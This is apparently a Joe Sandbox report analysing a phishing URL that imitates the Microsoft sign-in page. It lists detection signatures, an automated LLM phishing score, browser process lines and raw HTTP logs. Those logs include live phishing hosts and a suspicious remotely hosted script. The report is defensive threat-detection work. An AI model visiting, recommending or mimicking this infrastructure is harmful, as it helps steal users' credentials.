Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://apeidieppe-d.basiic.net/yKKWd

Overview

General Information

Sample URL:https://apeidieppe-d.basiic.net/yKKWd
Analysis ID:1539393
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Phishing site detected (based on favicon image match)
Phishing site detected (based on logo match)
Phishing site detected (based on shot match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1952,i,1099532071707917260,5294793716901066126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 7020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://apeidieppe-d.basiic.net/yKKWd" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: https://apeidieppe-d.basiic.net/yKKWd/LLM: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'apeidieppe-d.basiic.net' does not match the legitimate domain for Microsoft., The URL contains suspicious elements such as an unusual domain name 'basiic.net' and a subdomain 'apeidieppe-d' which are not associated with Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing. DOM: 1.4.pages.csv
    Source: Yara matchFile source: 1.4.pages.csv, type: HTML
    Source: https://basiic.netMatcher: Template: microsoft matched with high similarity
    Source: https://apeidieppe-d.basiic.net/yKKWd/Matcher: Template: microsoft matched
    Source: https://apeidieppe-d.basiic.net/yKKWd/Matcher: Template: captcha matched
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: Number of links: 0
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: Title: Sign in to your account does not match URL
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: Invalid link: Privacy statement
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: <input type="password" .../> found
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: No favicon
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: No favicon
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: No favicon
    Source: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsHTTP Parser: No favicon
    Source: https://5102487645.my.id/HTTP Parser: No favicon
    Source: https://5102487645.my.id/HTTP Parser: No favicon
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: No <meta name="author".. found
    Source: https://apeidieppe-d.basiic.net/yKKWd/HTTP Parser: No <meta name="copyright".. found
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49726 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49799 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: global trafficHTTP traffic detected: GET /yKKWd HTTP/1.1Host: apeidieppe-d.basiic.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /yKKWd/ HTTP/1.1Host: apeidieppe-d.basiic.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a0f0a98ece91e&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a0f0a98ece91e&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gMNfPcGdfAFaFbr&MD=Wr9+2x7V HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: apeidieppe-d.basiic.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apeidieppe-d.basiic.net/yKKWd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4ghhpb396a5ubs4qoebu2iv728
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8d6a0f0a98ece91e/1729606102483/7co4aaUL0qHQce5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8d6a0f0a98ece91e/1729606102483/7co4aaUL0qHQce5 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8d6a0f0a98ece91e/1729606102485/2b499979905af05a4e97622bbcf04e6b2e9563bd02bab4a959d000ca1bfedbd1/epifzsflhhzta5x HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/to.css.map HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/to.css.map HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://apeidieppe-d.basiic.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://apeidieppe-d.basiic.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://apeidieppe-d.basiic.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 5102487645-1323985617.cos.eu-frankfurt.myqcloud.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js.map HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js.map HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js.map HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
